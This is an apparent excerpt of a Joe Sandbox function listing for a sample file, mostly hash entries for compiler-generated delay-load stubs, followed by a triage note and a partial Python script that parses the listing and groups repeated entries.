                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: e930dbe418d21b8589b6e343c9626f8a2f21356fb8ae732f7500ea8c5c9b8a16
                                        • Instruction ID: 05f00fb8fc49e5fd49783e5ec62ace9f431e40cea10e3fb7d79c289411c51d16
                                        • Opcode Fuzzy Hash: e930dbe418d21b8589b6e343c9626f8a2f21356fb8ae732f7500ea8c5c9b8a16
                                        • Instruction Fuzzy Hash: 70C0023441021AD68E214E28A84A4997622AA573A67F6D7D4D02DC96A1C7338CA7EA21
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00278187
                                          • Part of subcall function 00284F2B: __EH_prolog3.LIBCMT ref: 00284F32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 0b57b58d42d387c264d2a6a2bbeb4aa63c0e85b2abbe49c4a88ff55814e6e478
                                        • Instruction ID: 2a867926c0ccd0cbaf30c152610b0dca68683578ac54a2c06e58c5620c171f24
                                        • Opcode Fuzzy Hash: 0b57b58d42d387c264d2a6a2bbeb4aa63c0e85b2abbe49c4a88ff55814e6e478
                                        • Instruction Fuzzy Hash: 97C012B4B30934C7DF02BFA4880379CA1206B50B02F400249F6005B282CFB80B218BCA
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d83f134290fa418240b453aeacdd4893fb46026399ff44418c3551bf26e001c5
                                        • Instruction ID: 55cb863b876c0e8ea4326ba0e414bcdf3adbc8aed77b7f1f336b0505396d7d51
                                        • Opcode Fuzzy Hash: d83f134290fa418240b453aeacdd4893fb46026399ff44418c3551bf26e001c5
                                        • Instruction Fuzzy Hash: 52B012852FD001BC350431041F02C36010CC8D1B22331831FF410D058294800C730431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: b88ebc6df4b4044c303112b965f5b7b9ef262049379d16dd6f8fd476513436c9
                                        • Instruction ID: 246e49497d5aad1473cfc706313d7e97a4eee1fb281b411c1da1621076e23d35
                                        • Opcode Fuzzy Hash: b88ebc6df4b4044c303112b965f5b7b9ef262049379d16dd6f8fd476513436c9
                                        • Instruction Fuzzy Hash: EBB0128127D001AC350471141E02D37010CC0C1B11331822FF410C1681D4800C770531
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e2796055fcf8da54c47bd43b00d10ff5afc982b2154c502aac059bdca6c94a8a
                                        • Instruction ID: dbeb4b344dea1cd7421a1541fd48dde5cc8827630186263838d5b4f7dd12e90f
                                        • Opcode Fuzzy Hash: e2796055fcf8da54c47bd43b00d10ff5afc982b2154c502aac059bdca6c94a8a
                                        • Instruction Fuzzy Hash: 80B0128127D002AC350471141D02E36010CC0C1B11331422FF410C1A81D4800C760531
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 72c3eaabfea461826fb0359fbcf0d3faac2293e397e59accbbb53425f38d215e
                                        • Instruction ID: 06dbc780e1c7d87fdb1735dca839936af1f5752003a7fa4c951c9d34dae05f3b
                                        • Opcode Fuzzy Hash: 72c3eaabfea461826fb0359fbcf0d3faac2293e397e59accbbb53425f38d215e
                                        • Instruction Fuzzy Hash: C3B0128127D001EC350471241D02D37010CC0C1B11331822FF800C1681D4800C760531
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c9e2d9b11d596a4ee2a703f21de878425249de57c7233c938b1a2bc9263ef3ad
                                        • Instruction ID: cf79fcba16c38f90ecc2d8f8f32efb06d029049a238e0507b10a753a4239c731
                                        • Opcode Fuzzy Hash: c9e2d9b11d596a4ee2a703f21de878425249de57c7233c938b1a2bc9263ef3ad
                                        • Instruction Fuzzy Hash: 99B0128527D0036C360471141D02D3B010CD0C1B11330422FF404C1581E4C10C770431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f0f2da66d34b3f7394a443d89f2fa328445f77adf7bd0e154e0dfde5b96d0057
                                        • Instruction ID: 34c4c9f7922392d93d172eabcd4c64df6ac6227cf674f56248262654612d2851
                                        • Opcode Fuzzy Hash: f0f2da66d34b3f7394a443d89f2fa328445f77adf7bd0e154e0dfde5b96d0057
                                        • Instruction Fuzzy Hash: 1CB0128527D1026C374471151D02D3B010CC0C1B11330432FF404C1181E4C10CB70431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 710d8de0576efb3eb48b9c881352ca7f3587d3c33ba298dda9b900e149cad04c
                                        • Instruction ID: 2c478e446425c3f66e88ef7d164041b58766d34471c3bd990c57c6f905f9261c
                                        • Opcode Fuzzy Hash: 710d8de0576efb3eb48b9c881352ca7f3587d3c33ba298dda9b900e149cad04c
                                        • Instruction Fuzzy Hash: 97B0128527D0027C360471141D02D3B010CC4C2B11331821FF804C2181E4C00C7A0431
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 00282233
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 5f6d81c5830b6aad50e0646b4e0acb172d6ab95223eb3cdcca4eb0d70bcbf73b
                                        • Instruction ID: d004769c9ad06b72726266f00cc1bd58ae6224844f4df7c1a6de5166ec9e2fee
                                        • Opcode Fuzzy Hash: 5f6d81c5830b6aad50e0646b4e0acb172d6ab95223eb3cdcca4eb0d70bcbf73b
                                        • Instruction Fuzzy Hash: D0C04870216200DF8704DFA8EA8CA0A77AABFA2706B558469F840CB074CB34DC64DB25
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f6fdb39ee4769230fadd9bbf25b7ef108375c85817d18bd8964ac2dcf0b3a964
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: f6fdb39ee4769230fadd9bbf25b7ef108375c85817d18bd8964ac2dcf0b3a964
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 83cbf0f161390daf166967759db6f5f71a8a52b0871c8dd8d083d9e73ffbbeed
                                        • Instruction ID: f4a2ba856a821320018475497905e96a25cba758f6233ee02fa7a692c08b22a0
                                        • Opcode Fuzzy Hash: 83cbf0f161390daf166967759db6f5f71a8a52b0871c8dd8d083d9e73ffbbeed
                                        • Instruction Fuzzy Hash: A0A0019A2BE512BD3A0872616E06C7B021DD4D2B62331861AF801D5582A9811DAA1471
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ca461a80ce3d0c2c5a12de1cfb52f6cc11f0995fa520d0a34f00c44737e6fa0e
                                        • Instruction ID: 43fb352d493586b75684e55a503103ff82978981424b35710b1d88d089e57fd1
                                        • Opcode Fuzzy Hash: ca461a80ce3d0c2c5a12de1cfb52f6cc11f0995fa520d0a34f00c44737e6fa0e
                                        • Instruction Fuzzy Hash: 10A0019A2BE513BC3A0872616E06C7B021DD4D6BA23318A1AF802C5582A9811DAA1431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2987d1c8d898471122b0bd08f3a6cc236d77137d4eca79105d48b9a2a354307f
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: 2987d1c8d898471122b0bd08f3a6cc236d77137d4eca79105d48b9a2a354307f
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a0cbb471fae97db129ce221ab2f4c279e4b27b39dadb0f5f351f22b2b89ec7e7
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: a0cbb471fae97db129ce221ab2f4c279e4b27b39dadb0f5f351f22b2b89ec7e7
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 78edab25e7ed0c13caa2c8e010bf058b1d026008a4e50a59828573e8011d24a7
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: 78edab25e7ed0c13caa2c8e010bf058b1d026008a4e50a59828573e8011d24a7
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 191df4e3268436fa98338447837b17308c401ce5ceff2af9118407352b3bf567
                                        • Instruction ID: 43fb352d493586b75684e55a503103ff82978981424b35710b1d88d089e57fd1
                                        • Opcode Fuzzy Hash: 191df4e3268436fa98338447837b17308c401ce5ceff2af9118407352b3bf567
                                        • Instruction Fuzzy Hash: 10A0019A2BE513BC3A0872616E06C7B021DD4D6BA23318A1AF802C5582A9811DAA1431
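                                         Triage note on the entries above: every function that calls ___delayLoadHelper2@8 ends in RaiseException with code C06D0057. Decoded as an NTSTATUS-style value, that is severity 3 (error), facility 0x6D (FACILITY_VISUALCPP) and Win32 error 87 (ERROR_INVALID_PARAMETER), which is what the MSVC delay-load helper (delayhlp.cpp) raises for a malformed delay-load descriptor. Several of these entries also share one Instruction ID while carrying different Opcode IDs, i.e. they are per-import delay-load thunks emitted by the compiler, not sample-specific logic. The script below is an added example and is not part of the Joe Sandbox report; it parses a constructed excerpt in the listing's own "APIs" / "Opcode ID" / "Instruction ID" format, decodes the exception code, and groups entries that share an Instruction ID so that such stubs can be set aside during triage.

```python
"""Triage helper for Joe Sandbox function-listing entries.

Added example; this is not code from the Joe Sandbox report. SAMPLE is a
constructed excerpt built from fields visible in the listing (API references,
Opcode IDs, Instruction IDs), trimmed to what the parser needs.
"""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
  • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
  • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
• Opcode ID: f6fdb39ee4769230fadd9bbf25b7ef108375c85817d18bd8964ac2dcf0b3a964
• Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
  • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
  • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
• Opcode ID: 2987d1c8d898471122b0bd08f3a6cc236d77137d4eca79105d48b9a2a354307f
• Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
APIs
• SetDlgItemTextW.USER32(?,?,?), ref: 00271DFC
• Opcode ID: c231d5a8f14eef96c4f434cd1df85e485685c6dc047c26db3e774848381ebec4
• Instruction ID: ce9fbe84e4611742771707c3f10a9faf5aaeba25b1b3011ef8517d35b3166d4f
"""

FACILITY_VISUALCPP = 0x6D        # facility used by MSVC's VcppException() macro
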